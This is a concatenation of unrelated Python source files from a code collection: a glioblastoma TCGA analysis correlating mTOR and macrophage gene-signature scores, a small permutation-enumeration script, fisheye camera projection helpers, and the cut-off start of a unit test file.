\"RPS6KA2\", \"RPS6KA6\", \"IRS1\", \"PIK3R1\", \"PIK3R2\", \"PIK3R3\", \"PIK3CA\", \"PIK3CD\", \"PIK3CB\", \"PTEN\",\n \"PDPK1\", \"AKT1\", \"AKT2\", \"AKT3\", \"CHUK\", \"MAPKAP1\", \"RICTOR\", \"PRR5\", \"RHOA\", \"PRKCA\", \"PRKCB\", \"PRKCG\", \"SGK1\",\n \"LPIN1\"\n]\n\npid_mtor = [\n \"SSPO\", \"SGK1\", \"EEF2K\", \"IKBKB\", \"PLD2\", \"PDPK1\", \"ATG13\", \"ULK1\", \"NRAS\", \"HRAS\", \"KRAS\", \"RAF1\", \"EIF4E\",\n \"EEF2\", \"BRAF\", \"PRKCA\", \"RPS6KB1\", \"EIF4B\", \"CCNE1\", \"CDK2\", \"YY1\", \"YWHAQ\", \"MAPK3\", \"MAPK1\", \"PML\", \"CLIP1\",\n \"AKT1\", \"YWHAB\", \"SFN\", \"IRS1\", \"MAP2K2\", \"SREBF1\", \"MTOR\", \"PXN\", \"TSC2\", \"EIF4A1\", \"RHOA\", \"YWHAG\", \"YWHAE\",\n \"RAC1\", \"YWHAZ\", \"PRR5\", \"CYCS\", \"MAP2K1\", \"YWHAH\", \"BNIP3\", \"PLD1\", \"EIF4EBP1\", \"RHEB\", \"RPS6KA1\", \"PDCD4\",\n \"RRAGB\", \"RICTOR\", \"RRAGA\", \"ULK2\", \"RPTOR\", \"DEPTOR\", \"RB1CC1\", \"TSC1\", \"AKT1S1\", \"MAPKAP1\", \"MLST8\",\n \"POLDIP3\", \"RRAGC\", \"RRAGD\", \"DDIT4\", \"RRN3\", \"PPARGC1A\", \"FBXW11\"\n]\n\nbiocarta_mtor = [\n \"EIF4A1\", \"EIF4A2\", \"EIF4B\", \"EIF4E\", \"EIF4EBP1\", \"EIF4G1\", \"EIF4G2\", \"AKT1\", \"FKBP1A\", \"MTOR\", \"PDK2\", \"PDPK1\",\n \"PIK3CA\", \"PIK3R1\", \"PPP2CA\", \"PTEN\", \"RPS6\", \"RPS6KB1\", \"TSC1\", \"TSC2\", \"MKNK1\", \"EIF3A\", \"EIF4G3\"\n]\n\nmanual_gene_name_correction = {\n 'ATG13': 'KIAA0652',\n 'CASTOR1': 'GATSL3',\n 'CASTOR2': 'GATSL2', # might also be GATSL1?\n 'DEPTOR': 'DEPDC6',\n 'LAMTOR1': 'C11orf59',\n 'LAMTOR2': 'ROBLD3',\n 'LAMTOR3': 'MAPKSP1',\n 'LAMTOR4': 'C7orf59',\n 'LAMTOR5': 'HBXIP',\n 'TTI1': 'KIAA0406',\n 'VEGFD': 'FIGF',\n 'HLA-DMB': 'HLA.DMB',\n 'HLA-DQA1': 'HLA.DQA1',\n 'HLA-DRB5': 'HLA.DRB5'\n}\n\n\ndef z_transform(df, axis=None):\n if axis is None:\n return (df - df.values.flatten().mean()) / df.values.flatten().std()\n elif axis == 0:\n i = 0\n j = 1\n elif axis == 1:\n i = 1\n j = 0\n else:\n raise NotImplementedError(\"axis argument must be None, 0 or 1.\")\n return df.subtract(df.mean(axis=i), axis=j).divide(df.std(axis=i), axis=j)\n\n\ndef ols_plot(y, x, add_intercept=True, alpha=0.05, xlim=None, ax=None):\n \"\"\"\n Generate a scatter plot with OLS prediction plus confidence intervals\n :param y:\n :param x:\n :param add_intercept:\n :param alpha:\n :param ax:\n :return:\n \"\"\"\n if ax is None:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n try:\n x = x.astype(float)\n except Exception:\n pass\n\n if add_intercept:\n X = sm.add_constant(x)\n else:\n X = x\n\n model = sm.OLS(y, X)\n res = model.fit()\n\n # plot data\n ax.scatter(x, y, marker='o')\n if xlim is None:\n xlim = np.array(ax.get_xlim())\n\n xx = np.linspace(xlim[0], xlim[1], 100)\n\n # compute prediction and confidence intervals\n if add_intercept:\n b0, b1 = res.params\n sdev, lower, upper = wls_prediction_std(res, sm.add_constant(xx), alpha=alpha)\n # b0_min, b0_max = res.conf_int(alpha=alpha)[0]\n # b1_min, b1_max = res.conf_int(alpha=alpha)[1]\n\n else:\n b1 = res.params[0]\n b0 = 0.\n sdev, lower, upper = wls_prediction_std(res, xx, alpha=alpha)\n # b0 = b0_min = b0_max = 0.\n # b1_min, b1_max = res.conf_int(alpha=alpha)[0]\n\n ax.plot(xx, b0 + b1 * xx, 'k-', lw=1.5)\n ax.fill_between(xx, lower, upper, edgecolor='b', facecolor='b', alpha=0.4)\n\n # lower = b0_min + b1_min * xlim\n # upper = b0_max + b1_max * xlim\n # ax.fill_between(xlim, lower, upper, edgecolor='b', facecolor='b', alpha=0.4)\n\n ax.set_xlim(xlim)\n return res, ax\n\n\ndef scatter_plot_with_linregress(x, y, group_list=None, groups=None):\n nrow = 2\n reduce_before_return = False\n if groups is None:\n # no subgroups: just run with 'all'\n nrow = 1\n ncol = 1\n group_list = ['foo']\n groups = pd.Series('foo', index=x.index)\n reduce_before_return = True\n else:\n if group_list is None:\n group_list = groups.unique()\n # add 'all' to the group list\n group_list = list(group_list) + [None]\n ncol = int(np.ceil(len(group_list) * 0.5))\n res = pd.DataFrame(index=group_list, columns=['slope', 'intercept', 'rvalue', 'pvalue', 'stderr'])\n sm_res = {}\n\n fig, axs = plt.subplots(nrow, ncol, sharex=True, sharey=True)\n if reduce_before_return:\n axs = np.array([axs])\n\n axs_seen = set(axs.flat)\n\n for i, sg in enumerate(group_list):\n if sg is None:\n sg_idx = pd.Series(True, index=groups.index)\n ttl = 'All'\n else:\n sg_idx = (groups == sg)\n ttl = sg\n this_x = x.loc[sg_idx].values.astype(float)\n this_y = y.loc[sg_idx].values.astype(float)\n lr = stats.linregress(this_x, this_y)\n res.loc[sg] = lr\n\n ax = axs.flat[i]\n axs_seen.remove(ax)\n\n sm_res[ttl], _ = ols_plot(\n this_y,\n this_x,\n xlim=[-3.5, 3.5],\n ax=ax\n )\n\n rsq = lr.rvalue ** 2\n sl = lr.slope\n pval = lr.pvalue\n\n if np.abs(sl - sm_res[ttl].params[-1]) > 1e-3:\n logger.warn(\"Subgroup %s. stats.linregress slope doesn't agree with statsmodels OLS.\", sg)\n\n if pval < 0.05:\n lbl = \"$R^2 = %.2f$\\n$\\mathrm{slope}=%.2f$\\n$p=\\mathbf{%.3e}$\" % (rsq, sl, pval)\n else:\n lbl = \"$R^2 = %.2f$\\n$\\mathrm{slope}=%.2f$\\n$p=%.3e$\" % (rsq, sl, pval)\n ax.text(\n 1.,\n 0.,\n lbl,\n bbox={'facecolor': 'w', 'alpha': 0.3},\n verticalalignment='bottom',\n horizontalalignment='right',\n transform=ax.transAxes\n )\n ax.set_ylim([-4, 4])\n ax.set_xlabel(x.name)\n ax.set_ylabel(y.name)\n if not reduce_before_return:\n ax.set_title(ttl)\n\n if reduce_before_return:\n res = res.loc['foo']\n\n for ax in axs_seen:\n ax.set_visible(False)\n\n return {\n 'fig': fig,\n 'axs': axs,\n 'linregress': res,\n 'statsmodels': sm_res\n }\n\n\ndef get_slope_and_pval(plot_dict, col_order=None):\n \"\"\"\n Extract the slope and pvalue of the linear regression results\n :param col_order: if supplied, this gives the order of the index in the returned DataFrames.\n :param plot_dict: Dictionary of input data.\n Keys will be used in the results. Values are the dict output from scatter_plot_with_linregress\n :return: Two pd.DataFrame objects: s, p\n \"\"\"\n if col_order is None:\n col_order = plot_dict.values()[0]['statsmodels'].keys()\n s = pd.DataFrame(index=plot_dict.keys(), columns=col_order)\n p = s.copy()\n\n for k, v in plot_dict.items():\n s.loc[k] = [v['statsmodels'][t].params[-1] for t in col_order]\n p.loc[k] = [v['statsmodels'][t].f_pvalue for t in col_order]\n\n return s, p\n\n\ndef plot_signature_vs_gene(dat, es, the_gene, geneset_name, ax=None):\n the_expr = dat.loc[the_gene]\n # Z transform the signature scores for this gene set\n the_signature = es.loc[geneset_name]\n the_signature = (the_signature - the_signature.mean()) / the_signature.std()\n # ensure the ordering is the same\n the_signature = the_signature.loc[the_expr.index]\n lr = stats.linregress(the_signature.astype(float), np.log2(the_expr + 1))\n x_lr = np.array([the_signature.min(), the_signature.max()])\n y_lr = lr.intercept + lr.slope * x_lr\n\n if ax is None:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n else:\n fig = None\n\n ax.scatter(the_signature, np.log2(the_expr + 1))\n ax.plot(x_lr, y_lr, 'k--')\n ax.set_xlabel('Normalised ssGSEA score')\n ax.set_ylabel('log2(%s)' % the_gene)\n if fig is not None:\n fig.tight_layout()\n return ax\n\n\ndef mtor_signature_dict():\n # kegg mtor from msigdb (hsa04150)\n for arr in [kegg_mtor_from_msigdb, kegg_mtor_from_kegg, pid_mtor, biocarta_mtor]:\n for i, t in enumerate(arr):\n if t in manual_gene_name_correction:\n arr[i] = manual_gene_name_correction[t]\n\n return {\n 'kegg_msigdb': kegg_mtor_from_msigdb,\n 'kegg': kegg_mtor_from_kegg,\n 'biocarta': biocarta_mtor,\n 'pid': pid_mtor\n }\n\n\ndef tam_signature_dict():\n # Human-specific by Muller et al.\n muller_tam_signature_fn = os.path.join(GIT_LFS_DATA_DIR, 'muller_2017_tam', '13059_2017_1362_MOESM5_ESM.xlsx')\n muller_tam_signatures = pd.read_excel(muller_tam_signature_fn, header=0, index_col=None)\n muller_tam_signatures = {\n 'MG': muller_tam_signatures['MG_Markers'].dropna().values,\n 'BMDM': muller_tam_signatures['Mac_Markers'].dropna().values,\n }\n\n # Mouse version (needs translating) by Bowman et al.\n bowman_tam_signature_fn = os.path.join(DATA_DIR, 'rnaseq', 'GSE86573', 'table_S2.csv')\n bowman_tam_signatures = pd.read_csv(bowman_tam_signature_fn, header=0, index_col=None)\n\n # generate series of orthologs of the relevant gene signatures\n orth = reference_genomes.homologs_table(reference_genomes.mouse_tid, reference_genomes.human_tid)\n orth = orth.set_index('gene_symbol_10090').squeeze()\n\n bowman_tam_signatures = {\n 'MG': orth.reindex(bowman_tam_signatures['MG'].dropna().values).dropna().values,\n 'BMDM': orth.reindex(bowman_tam_signatures['BMDM'].dropna().values).dropna().values,\n }\n\n return {\n 'bowman': bowman_tam_signatures,\n 'muller': muller_tam_signatures,\n }\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Use the TCGA cohort to validate a link between the mTOR pathway and the proportion of microglial and macrophage\n immune infiltrate in the bulk samples.\n \n mTOR is assessed using a known set of genes.\n \n Tumour-associated bone marrow-derived macrophages (TAM-BMDM) and microglia (TAM-MG) are distinguished using a \n human signature from Muller et al. (Genome Biol 2017) or a converted mouse signature from Bowman et al. (???).\n \"\"\"\n rnaseq_type = 'gliovis'\n remove_idh1 = True\n tam_signature_source = 'bowman'\n # tam_signature_source = 'muller'\n mtor_source = 'kegg_msigdb' # ('kegg', 'pid', 'biocarta')\n # class_method = 'wang'\n class_method = 'verhaak'\n # toggle allowing more than one class to be used\n allow_multiple_classes = False\n\n # load mTOR signatures\n mtor_gs_dict = mtor_signature_dict()\n\n # load MG/BMDM signatures\n tam_gs_dict = tam_signature_dict()\n\n mtor_geneset = mtor_gs_dict[mtor_source]\n tam_genesets = tam_gs_dict[tam_signature_source]\n\n genesets = dict(tam_genesets)\n genesets['mTOR'] = mtor_geneset\n\n outdir = output.unique_output_dir()\n\n # export all signatures to a file\n from utils import dictionary\n\n all_gs_dict = dictionary.nested_dict_to_flat(tam_gs_dict)\n all_gs_dict[('mTOR',)] = mtor_geneset\n\n for_export = pd.DataFrame(index=range(max((len(t) for t in all_gs_dict.values()))), columns=[])\n for k, v in all_gs_dict.items():\n the_key = '_'.join(k)\n for_export.loc[range(len(v)), the_key] = sorted(v)\n for_export.fillna('', inplace=True)\n for_export = for_export.sort_index(axis=1)\n for_export.to_excel(os.path.join(outdir, \"gene_sets.xlsx\"), index=False)\n\n # Venn diagram showing various mTOR signature options and overlap between them\n fig, ax = plt.subplots()\n venn.venn_diagram(*mtor_gs_dict.values(), set_labels=mtor_gs_dict.keys(), ax=ax)\n fig.tight_layout()\n ax.set_facecolor('w')\n fig.savefig(os.path.join(outdir, \"venn_mtor_genesets.png\"), dpi=200)\n\n basedir = os.path.join(\n HGIC_LOCAL_DIR,\n 'current/input_data/tcga'\n )\n\n brennan_s7_fn = os.path.join(basedir, \"brennan_s7.csv\")\n brennan_s7 = pd.read_csv(brennan_s7_fn, header=0, index_col=0)\n\n if rnaseq_type == 'counts':\n rnaseq_dat_fn = os.path.join(basedir, 'rnaseq.xlsx')\n rnaseq_meta_fn = os.path.join(basedir, 'rnaseq.meta.xlsx')\n sheet_name = 'htseq'\n wang_fn = os.path.join(basedir, 'wang_classification', 'tcga_counts_wang_classification.csv')\n elif rnaseq_type == 'fpkm':\n rnaseq_dat_fn = os.path.join(basedir, 'rnaseq.xlsx')\n rnaseq_meta_fn = os.path.join(basedir, 'rnaseq.meta.xlsx')\n sheet_name = 'fpkm'\n wang_fn = os.path.join(basedir, 'wang_classification', 'tcga_fpkm_wang_classification.csv')\n elif rnaseq_type == 'gliovis':\n rnaseq_dat_fn = os.path.join(basedir, 'gliovis', 'gliovis_tcga_gbm_rnaseq.xlsx')\n wang_fn = os.path.join(basedir, 'gliovis', 'wang_classification', 'tcga_gliovis_wang_classification.csv')\n sheet_name = 0\n else:\n raise NotImplementedError(\"Unrecognised rnaseq data type\")\n\n\n rnaseq_dat_raw = pd.read_excel(rnaseq_dat_fn, header=0, index_col=0, sheet_name=sheet_name)\n wang_classes = pd.read_csv(wang_fn, header=0, index_col=0)\n\n if rnaseq_type == 'gliovis':\n rnaseq_meta_fn = os.path.join(basedir, 'gliovis', 'GlioVis_TCGA_GBMLGG.meta.xlsx')\n rnaseq_meta = pd.read_excel(rnaseq_meta_fn, header=0, index_col=0)\n # filter only GBM\n rnaseq_meta = rnaseq_meta.loc[rnaseq_meta.Histology == 'GBM']\n rnaseq_dat_raw = rnaseq_dat_raw.loc[:, rnaseq_meta.index]\n\n rnaseq_meta.rename(\n columns={'IDH.status': 'idh1_status', 'Subtype.original': 'expression_subclass'},\n inplace=True\n )\n\n else:\n # simplify sample naming\n new_cols = rnaseq_dat_raw.columns.str.replace(r'(?PTCGA-[0-9]{2}-[0-9]{4})-.*', r'\\g')\n\n # rnaseq_meta = rnaseq_meta.loc[~new_cols.duplicated()]\n rnaseq_dat_raw = rnaseq_dat_raw.loc[:, ~new_cols.duplicated()]\n # rnaseq_meta.index = new_cols[~new_cols.duplicated()]\n rnaseq_dat_raw.columns = new_cols[~new_cols.duplicated()]\n rnaseq_meta = brennan_s7.reindex(rnaseq_dat_raw.columns)\n\n\n if remove_idh1:\n # filter IDH1 mutants\n idh1_wt = (~rnaseq_meta.idh1_status.isnull()) & (rnaseq_meta.idh1_status == 'WT')\n\n rnaseq_meta = rnaseq_meta.loc[idh1_wt]\n rnaseq_dat = rnaseq_dat_raw.loc[:, rnaseq_meta.index]\n else:\n rnaseq_dat = rnaseq_dat_raw.loc[:, rnaseq_dat_raw.columns.str.contains('TCGA')]\n\n if rnaseq_type != 'gliovis':\n # add gene symbols for gene signature scoring?\n gs = reference_genomes.ensembl_to_gene_symbol(rnaseq_dat.index).dropna()\n rnaseq_dat = rnaseq_dat.loc[gs.index]\n rnaseq_dat.index = gs.values\n\n if rnaseq_type == 'counts':\n # convert to CPM\n rnaseq_dat = rnaseq_dat.divide(rnaseq_dat.sum(axis=0), axis=1) * 1e6\n\n rnaseq_meta.insert(0, 'wang_classification_simplicity', wang_classes.loc[rnaseq_meta.index, 'Simplicity score'])\n rnaseq_meta.insert(0, 'wang_classification_num_matches', wang_classes.loc[rnaseq_meta.index, 'Number of matches'])\n rnaseq_meta.insert(0, 'wang_classification', wang_classes.loc[rnaseq_meta.index, 'Wang subclass'])\n\n # check that signature genes are all found in the data\n for k, v in genesets.items():\n for i, t in enumerate(v):\n if t in manual_gene_name_correction:\n v[i] = manual_gene_name_correction[t]\n g_in = rnaseq_dat.index.intersection(v)\n if set(g_in) != set(v):\n missing = set(v).difference(rnaseq_dat.index)\n logger.warn(\n \"%d genes in the %s signature do not match with the data index and will be dropped: %s.\",\n len(missing),\n k,\n ', '.join(missing)\n )\n genesets[k] = g_in\n\n # check here whether there is any overlap\n vs, vc = setops.venn_from_arrays(*genesets.values())\n n_overlap = sum([vc[t] for t in setops.binary_combinations_sum_gte(len(genesets), 2)])\n if n_overlap > 0:\n logger.warn(\n \"The %d gene signatures used here have %d overlapping genes - please check this is OK.\",\n len(genesets),\n n_overlap\n )\n\n # run ssGSEA then Z transform the results\n es = gsva.ssgsea(rnaseq_dat, genesets)\n es_z = z_transform(es, axis=1)\n\n # export\n for_export = es_z.transpose()\n for_export.insert(for_export.shape[1], 'Verhaak classification', rnaseq_meta.loc[for_export.index, 'expression_subclass'])\n for_export.insert(for_export.shape[1], 'Wang classification', rnaseq_meta.loc[for_export.index, 'wang_classification'])\n for_export.to_excel(os.path.join(outdir, \"tcga_signature_scores_and_subgroups.xlsx\"))\n\n # boxplot by subgroup\n if class_method == 'verhaak':\n groups = rnaseq_meta.expression_subclass\n # remove any small groups (e.g. a single G-CIMP instance)\n group_list = groups.value_counts()\n group_list = group_list.index[group_list > 2]\n elif class_method == 'wang':\n groups = rnaseq_meta.wang_classification\n if not allow_multiple_classes:\n groups[rnaseq_meta.wang_classification_num_matches != 1] = None\n group_list = groups.dropna().unique()\n else:\n raise NotImplementedError(\"Subgroup type not recognised.\")\n\n groups = groups.fillna('NONE')\n group_list = sorted(group_list)\n\n bplot = {}\n for k in genesets:\n the_data = es_z.loc[k]\n bplot[k] = collections.OrderedDict()\n for sg in group_list:\n bplot[k][sg] = the_data.loc[groups.fillna('').str.contains(sg)].values\n\n lbl, tmp = zip(*bplot[k].items())\n tmp = [list(t) for t in tmp]\n fig = plt.figure(num=k, figsize=(5, 4))\n ax = fig.add_subplot(111)\n sns.boxplot(data=tmp, orient='v', ax=ax, color='0.5')\n ax.set_xticklabels(lbl, rotation=45)\n ax.set_ylabel(\"Normalised ssGSEA score\")\n fig.tight_layout()\n fig.savefig(os.path.join(outdir, '%s_ssgsea_by_subgroup_tcga.png' % k.lower()), dpi=200)\n fig.savefig(os.path.join(outdir, '%s_ssgsea_by_subgroup_tcga.pdf' % k.lower()))\n\n # is the correlation between MG / BMDM and mTOR higher in a given subgroup?\n gs = plt.GridSpec(6, 3)\n fig = plt.figure(figsize=(9, 6))\n # left panel is 2 x 2, comprising all 4 subgroups\n\n dict_mg = scatter_plot_with_linregress(es_z.loc['mTOR'], es_z.loc['MG'], group_list, groups)\n dict_bmdm = scatter_plot_with_linregress(es_z.loc['mTOR'], es_z.loc['BMDM'], group_list, groups)\n\n dict_mg['fig'].savefig(os.path.join(outdir, \"mtor_vs_mg_correlation_by_tcga_subgroup.png\"), dpi=300)\n dict_mg['fig'].savefig(os.path.join(outdir, \"mtor_vs_mg_correlation_by_tcga_subgroup.pdf\"))\n\n dict_bmdm['fig'].savefig(os.path.join(outdir, \"mtor_vs_bmdm_correlation_by_tcga_subgroup.png\"), dpi=300)\n dict_bmdm['fig'].savefig(os.path.join(outdir, \"mtor_vs_bmdm_correlation_by_tcga_subgroup.pdf\"))\n\n # check for MG / BMDM correlation\n dict_both = scatter_plot_with_linregress(es_z.loc['MG'], es_z.loc['BMDM'], group_list, groups)\n dict_both['fig'].savefig(os.path.join(outdir, \"mg_vs_bmdm_correlation_by_tcga_subgroup.png\"), dpi=300)\n dict_both['fig'].savefig(os.path.join(outdir, \"mg_vs_bmdm_correlation_by_tcga_subgroup.pdf\"))\n\n # again but across groups\n dict_both_uniform = scatter_plot_with_linregress(es_z.loc['MG'], es_z.loc['BMDM'])\n dict_both_uniform['fig'].set_size_inches([6, 4])\n dict_both_uniform['fig'].tight_layout()\n dict_both_uniform['fig'].savefig(os.path.join(outdir, \"mg_vs_bmdm_correlation.png\"), dpi=200)\n dict_both_uniform['fig'].savefig(os.path.join(outdir, \"mg_vs_bmdm_correlation.pdf\"))\n\n # summary plot with all information\n alpha = 0.01\n slope_cmap = plt.get_cmap('RdBu_r')\n slope_norm = common.MidpointNormalize(vmin=-.5, vmax=1.2, midpoint=0.)\n slope_sm = plt.cm.ScalarMappable(cmap=slope_cmap, norm=slope_norm)\n\n group_list_extended = list(group_list) + ['All']\n\n for_plot = collections.OrderedDict([\n # ('MG-BMDM', dict_both),\n ('mTOR-MF', dict_bmdm),\n ('mTOR-MG', dict_mg)\n ])\n\n s, p = get_slope_and_pval(\n for_plot,\n col_order=group_list_extended,\n )\n\n # p_to_size = lambda t: min(150., 45 - 15 * np.log10(t))\n p_to_size = lambda t: min(500., 100 + 10 * np.log10(t) ** 2)\n\n x = range(len(group_list_extended))\n y_fun = lambda t: [t] * len(group_list_extended)\n\n fig, ax = plt.subplots(figsize=(6, 2.4))\n for i, k in enumerate(s.index):\n ax.scatter(\n x,\n y_fun(i),\n color=[slope_sm.to_rgba(t) for t in s.loc[k]],\n s=[p_to_size(t) for t in p.loc[k]],\n edgecolor='k',\n linewidth=[.5 if t > alpha else 1.5 for t in p.loc[k]]\n )\n ax.grid('off')\n ax.set_facecolor('w')\n ax.set_xticks(x)\n ax.set_xticklabels(group_list_extended)\n ax.set_yticks(range(p.shape[0]))\n ax.set_yticklabels(p.index)\n ax.set_ylim([-.5, p.shape[0] - 0.5])\n\n slope_sm.set_array(s.values)\n cbar = fig.colorbar(slope_sm)\n cbar.set_label('Slope')\n fig.tight_layout()\n fig.savefig(os.path.join(outdir, \"tcga_correlation_summary.png\"), dpi=200)\n fig.savefig(os.path.join(outdir, \"tcga_correlation_summary.pdf\"))\n\n plt_dict = line_plot_pvalues_slope(p, s, alpha=.05)\n plt_dict['fig'].set_size_inches([6., 2.5])\n plt_dict['gs'].update(bottom=0.23, top=0.9, hspace=0.4, right=0.75)\n plt_dict['fig'].savefig(os.path.join(outdir, \"tcga_correlation_summary_line.png\"), dpi=200)\n plt_dict['fig'].savefig(os.path.join(outdir, \"tcga_correlation_summary_line.pdf\"))","sub_path":"scripts/anaelle/tcga_tam_vs_mtor.py","file_name":"tcga_tam_vs_mtor.py","file_ext":"py","file_size_in_byte":26715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"67217156","text":"\"\"\"\nn个数字的可重复排列\n\n已知n等于4\n\"\"\"\n\n\ndef perm4():\n global count\n i = 4\n for a[i] in range(1, n + 1):\n if i == 4:\n count += 1\n print(f\"{a[1]},{a[2]},{a[3]},{a[4]}\")\n else:\n pass\n #perm5()\n\n\ndef perm3():\n global count\n i=3\n for a[i] in range(1, n + 1):\n if i==4:\n count += 1\n print(f\"{a[1]},{a[2]},{a[3]},{a[4]}\")\n else:\n perm4()\n\ndef perm2():\n global count\n i=2\n for a[i] in range(1, n + 1):\n if i==4:\n count += 1\n print(f\"{a[1]},{a[2]},{a[3]},{a[4]}\")\n else:\n perm3()\n\ndef perm1():\n global count\n i=1\n for a[i] in range(1, n + 1):\n if i==4:\n count += 1\n print(f\"{a[1]},{a[2]},{a[3]},{a[4]}\")\n else:\n perm2()\n\n\nn=4\ncount = 0\na =[0]*5\nperm1()\n\nprint(f\"共{count}种方案\")","sub_path":"AI.by.Search/1-3-4.repear.perm3-4.py1-1-3-4.repear.perm3-4.py","file_name":"1-3-4.repear.perm3-4.py1-1-3-4.repear.perm3-4.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"330464801","text":"import scipy.io as sio\nimport scipy.misc\nimport os\nimport numpy as np\nfrom math import pi, sin, cos, sqrt, atan\nfrom PIL import Image\n\ndef defineOutputRegions(imH,imW,carH,carW):\n output = np.zeros([imH,imW])\n m = (imH - carH) / (imW - carW)\n #top of image\n for i in range(1,int(np.floor((imH-carH)/2)+1)):\n for j in range(1,imW+1):\n if j*m-i>0 and j+i/m0 and j+i/m>=imW:\n output[i-1,j-1] = 2\n else:\n output[i-1,j-1] = 4\n #middle of image\n for i in range(int(np.floor((imH-carH)/2)+1),int(np.floor((imH+carH)/2)+1)):\n for j in range(1,imW+1):\n if j>np.floor((imW+carW)/2):\n output[i-1,j-1] = 2\n elif jimH and j-i/m<(imW-imH/m):\n output[i-1,j-1] = 3\n elif j*m+i>imH and j-i/m>=(imW-imH/m):\n output[i-1,j-1] = 2\n else:\n output[i-1,j-1] = 4\n return output\n\ndef getProjectionMat_vc(vc_params):\n # Virtual camera projection matrix estimation, given extrinsic and intrinsic parameters\n # Virtual camera angles\n thetax = -(pi/180) * vc_params['rotx']\n thetay = -(pi/180) * vc_params['roty']\n thetaz = -(pi/180) * vc_params['rotz']\n\n # Rotation matrix\n Rx = [[1, 0, 0], [0, cos(thetax), -sin(thetax)], [0, sin(thetax), cos(thetax)]]\n Ry = [[cos(thetay), 0, sin(thetay)], [0, 1, 0], [-sin(thetay), 0, cos(thetay)]]\n Rz = [[cos(thetaz), -sin(thetaz), 0], [sin(thetaz), cos(thetaz), 0], [0, 0, 1]]\n\n R = np.dot(np.dot(Rx, Ry), Rz)\n\n P = [[R[0, 0], R[0, 1], R[0, 2], 0], [R[1, 0], R[1, 1], R[1, 2], 0], [R[2, 0], R[2, 1], R[2, 2], 0], [0, 0, 0, vc_params['f']]]\n return P\n\n\ndef intrinsic_matrix(camNum, intrinsicParams):\n distortionFocalLength = intrinsicParams['distFocalLength'][camNum]\n distortionCenterX = intrinsicParams['distCenterX'][camNum]\n distortionCenterY = intrinsicParams['distCenterY'][camNum]\n K = [[distortionFocalLength, 0, distortionCenterX], [0, distortionFocalLength, distortionCenterY], [0, 0, 1]]\n return K\n\n\ndef ProjectiveTrans(imgNo, intrinsicParams, extrinsicParams, xw, yw, zw):\n K = intrinsic_matrix(imgNo, intrinsicParams)\n R_w2c = extrinsicParams['R_w2c'][imgNo]\n t_w2c = extrinsicParams['t_w2c'][imgNo]\n P = [[R_w2c[0, 0], R_w2c[0, 1], R_w2c[0, 2], t_w2c[0]], [R_w2c[1, 0], R_w2c[1, 1], R_w2c[1, 2], t_w2c[1]], [R_w2c[2, 0], R_w2c[2,1], R_w2c[2, 2], t_w2c[2]], [0, 0, 0, 1]]\n img_loc = np.dot(P, [xw, yw, zw, 1])\n\n #Normalization\n img_x = img_loc[0]/img_loc[2]\n img_y = img_loc[1]/img_loc[2]\n\n img_loc = np.dot(K, [img_x, img_y, 1])\n\n #Quantization\n img_x = np.round(img_loc[0])\n img_y = np.round(img_loc[1])\n img_loc = [img_x, img_y]\n\n return img_loc\n\n\ndef FisheyeTrans(xin, yin, xc, yc, xd, yd, f):\n #Fisheye distortion correction function\n ru = sqrt(np.power((xin-xc), 2) + np.power((yin-yc), 2))\n rd = 2*f*sin(atan(ru/f)/2)\n xout = (xin-xc)*rd/ru + xd\n yout = (yin-yc)*rd/ru + yd\n img_loc = [xout, yout]\n\n return img_loc\n\n\ndef getTransformedSV_AutoDots(imgNo, img, vc_params, intrinsicParams, extrinsicParams, vis_params):\n # AutoDots is the method of calibration using physical spheres placed in the synthetic scene to compute\n # the perspective transforms into the world coordinate space, which is the image space. This 'AutoDots'\n # method uses image coordinates as the 'world coordinates'\n #\n # The other method uses true world coordinates of the charts, which were also manually selected,\n # to compute the perspective transforms. Then there is an additional mapping from world coordinate\n # space into image space.\n\n #unpack visualization parameters\n s = vis_params['scale']\n zwmesh = vis_params['zwmesh']\n imW = vis_params['imW']\n imH = vis_params['imH']\n step_size = vis_params['step_size']\n\n Xc_undist = vis_params['Xc_undist']\n Xc_fish = vis_params['Xc_fish']\n\n vc_proj_mat = getProjectionMat_vc(vc_params) # projection matrix\n fdist = intrinsicParams['distFocalLength'][imgNo]\n xdist = intrinsicParams['distCenterX'][imgNo]\n ydist = intrinsicParams['distCenterY'][imgNo]\n\n pts_fisheye = []\n pts_world = []\n\n outputIm = np.zeros([imH, imW, img.shape[2]],'uint8')\n\n for iIdx in range(imH):\n i = iIdx + 1\n for jIdx in range(imW):\n j = jIdx + 1\n\n xw = j\n yw = i\n zw = zwmesh[iIdx,jIdx]\n\n loc_u = ProjectiveTrans(imgNo, intrinsicParams, extrinsicParams, xw, yw, zw) #loc in undistorted image\n xi = loc_u[0]\n yi = loc_u[1]\n\n loc_d = FisheyeTrans(yi, xi, Xc_undist[0], Xc_undist[1], Xc_fish[0], Xc_fish[1], fdist)\n yi_fish = loc_d[0]\n xi_fish = loc_d[1]\n\n xi_fish = int(np.round(xi_fish))\n yi_fish = int(np.round(yi_fish))\n\n if xi_fish<1:\n xi_fish = 1\n elif xi_fish>img.shape[1]:\n xi_fish = img.shape[1]\n\n if yi_fish<1:\n yi_fish = 1\n elif yi_fish>img.shape[0]:\n yi_fish = img.shape[0]\n\n outputIm[iIdx, jIdx, :] = img[yi_fish-1, xi_fish-1, :]\n\n return outputIm\n\n\ndef combine_seeds(image_dir, image_root, image_suff, num_seeds):\n images = []\n for seed in range(num_seeds):\n image_path = os.path.join(image_dir, image_root + '_s' + str(seed) + image_suff)\n images.append(np.array(Image.open(image_path)))\n\n return np.nanmin(np.asarray(images),0)\n","sub_path":"build_db/preprocess_functions.py","file_name":"preprocess_functions.py","file_ext":"py","file_size_in_byte":5790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"367469272","text":"#!/usr/bin/python3\n\"\"\" This is a test module for City Class\"\"\"\n\n\nfrom models.city import City\nfrom models import city\nimport pep8\nimport unittest\nimport os\n\n\nclass TestCity(unittest.TestCase):\n \"\"\"Class for test the City class\"\"\"\n\n def test_docstring(self):\n \"\"\" Method to test doctring module, class and func \"\"\"\n self.assertTrue(len(city.__doc__) > 0)\n self.assertTrue(len(City.__doc__) > 0)\n for fn in dir(City):\n self.assertTrue(len(fn.__doc__) > 0)\n\n def test_func_docstrings(self):\n 